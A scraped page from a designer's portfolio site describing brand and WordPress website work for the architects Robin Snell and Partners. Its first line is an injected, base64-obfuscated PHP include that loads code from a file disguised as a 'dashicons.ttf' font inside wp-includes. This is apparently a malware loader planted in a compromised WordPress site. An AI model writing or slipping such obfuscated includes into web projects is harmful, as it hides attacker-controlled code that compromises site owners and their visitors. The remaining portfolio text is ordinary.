@include base64_decode("L2hvbWUvamF5Z2xvdy9qYXlnbG93LmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); Robin Snell – jayglow

Robin Snell

Robin Snell

Website design

Brand creation, stationery and responsive website for architects, Robin Snell and Partners. They wanted a minimal brand which would sit alongside big images of their work. The focus was on imagery rather than text-heavy description pages. I worked with a programmer to build them a customisable WordPress website. View the site

The home page showcases a series of key projects which rotate randomly on page refresh

Alternate route 1

Alternate route 2

This is a unique website which will require a more modern browser to work!

Please upgrade today!